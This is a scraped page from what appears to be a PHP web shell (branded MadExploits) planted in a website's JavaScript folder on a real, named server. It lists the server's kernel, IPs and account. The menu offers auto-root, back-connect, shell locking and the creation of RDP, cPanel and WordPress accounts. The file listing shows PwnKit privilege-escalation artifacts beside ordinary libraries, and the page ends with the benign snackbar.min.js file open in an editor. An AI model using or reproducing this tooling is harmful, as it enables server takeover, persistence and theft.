Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.145.64.2
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
AccelCMS /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
ace-responsive-menu.js
4.59
KB
-rw-r--r--
bootstrap-select.min.js
44.06
KB
-rw-r--r--
bootstrap.min.js
58.6
KB
-rw-r--r--
chart-custome.js
4.25
KB
-rw-r--r--
chart.min.js
156.31
KB
-rw-r--r--
dashboard-script.js
1.99
KB
-rw-r--r--
google-maps.js
38.83
KB
-rw-r--r--
googlemaps1.js
2.85
KB
-rw-r--r--
googlemaps2.js
2.83
KB
-rw-r--r--
isotop.js
55.75
KB
-rw-r--r--
jquery-3.3.1.js
332.61
KB
-rw-r--r--
jquery-migrate-3.0.0.min.js
8.32
KB
-rw-r--r--
jquery-scrolltofixed-min.js
28.9
KB
-rw-r--r--
jquery.counterup.js
9.09
KB
-rw-r--r--
jquery.marquee.min.js
2.2
KB
-rw-r--r--
jquery.mmenu.all.js
23.53
KB
-rw-r--r--
parallax.js
33.07
KB
-rw-r--r--
popper.min.js
20.76
KB
-rw-r--r--
progressbar.js
5.91
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
script.js
30.31
KB
-rw-r--r--
script2.js
30.31
KB
-rw-r--r--
scrollto.js
6.88
KB
-rw-r--r--
simplebar.js
41.76
KB
-rw-r--r--
single-counter.js
655
B
-rw-r--r--
slider.js
116.34
KB
-rw-r--r--
smartuploader.js
749
B
-rw-r--r--
snackbar.min.js
3.31
KB
-rw-r--r--
timepicker.js
60.78
KB
-rw-r--r--
wow.min.js
8.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : snackbar.min.js
/*! * Snackbar v0.1.14 * http://polonel.com/Snackbar * * Copyright 2018 Chris Brame and other contributors * Released under the MIT license * https://github.com/polonel/Snackbar/blob/master/LICENSE */ !function(a,b){"use strict";"function"==typeof define&&define.amd?define([],function(){return a.Snackbar=b()}):"object"==typeof module&&module.exports?module.exports=a.Snackbar=b():a.Snackbar=b()}(this,function(){var a={};a.current=null;var b={text:"Default Text",textColor:"#FFFFFF",width:"auto",showAction:!0,actionText:"Dismiss",actionTextAria:"Dismiss, Description for Screen Readers",actionTextColor:"#4CAF50",showSecondButton:!1,secondButtonText:"",secondButtonAria:"Description for Screen Readers",secondButtonTextColor:"#4CAF50",backgroundColor:"#323232",pos:"bottom-left",duration:5e3,customClass:"",onActionClick:function(a){a.style.opacity=0},onSecondButtonClick:function(a){},onClose:function(a){}};a.show=function(d){var e=c(!0,b,d);a.current&&(a.current.style.opacity=0,setTimeout(function(){var a=this.parentElement;a&& // possible null if too many/fast Snackbars a.removeChild(this)}.bind(a.current),500)),a.snackbar=document.createElement("div"),a.snackbar.className="snackbar-container "+e.customClass,a.snackbar.style.width=e.width;var f=document.createElement("p");if(f.style.margin=0,f.style.padding=0,f.style.color=e.textColor,f.style.fontSize="14px",f.style.fontWeight=300,f.style.lineHeight="1em",f.innerHTML=e.text,a.snackbar.appendChild(f),a.snackbar.style.background=e.backgroundColor,e.showSecondButton){var g=document.createElement("button");g.className="action",g.innerHTML=e.secondButtonText,g.setAttribute("aria-label",e.secondButtonAria),g.style.color=e.secondButtonTextColor,g.addEventListener("click",function(){e.onSecondButtonClick(a.snackbar)}),a.snackbar.appendChild(g)}if(e.showAction){var h=document.createElement("button");h.className="action",h.innerHTML=e.actionText,h.setAttribute("aria-label",e.actionTextAria),h.style.color=e.actionTextColor,h.addEventListener("click",function(){e.onActionClick(a.snackbar)}),a.snackbar.appendChild(h)}e.duration&&setTimeout(function(){a.current===this&&(a.current.style.opacity=0, // When natural remove event occurs let's move the snackbar to its origins a.current.style.top="-100px",a.current.style.bottom="-100px")}.bind(a.snackbar),e.duration),a.snackbar.addEventListener("transitionend",function(b,c){"opacity"===b.propertyName&&"0"===this.style.opacity&&("function"==typeof e.onClose&&e.onClose(this),this.parentElement.removeChild(this),a.current===this&&(a.current=null))}.bind(a.snackbar)),a.current=a.snackbar,document.body.appendChild(a.snackbar);getComputedStyle(a.snackbar).bottom,getComputedStyle(a.snackbar).top;a.snackbar.style.opacity=1,a.snackbar.className="snackbar-container "+e.customClass+" snackbar-pos "+e.pos},a.close=function(){a.current&&(a.current.style.opacity=0)}; // Pure JS Extend // http://gomakethings.com/vanilla-javascript-version-of-jquery-extend/ var c=function(){var a={},b=!1,d=0,e=arguments.length;"[object Boolean]"===Object.prototype.toString.call(arguments[0])&&(b=arguments[0],d++);for(var f=function(d){for(var e in d)Object.prototype.hasOwnProperty.call(d,e)&&(b&&"[object Object]"===Object.prototype.toString.call(d[e])?a[e]=c(!0,a[e],d[e]):a[e]=d[e])};d<e;d++){var g=arguments[d];f(g)}return a};return a}); //# sourceMappingURL=snackbar.min.js.map
Close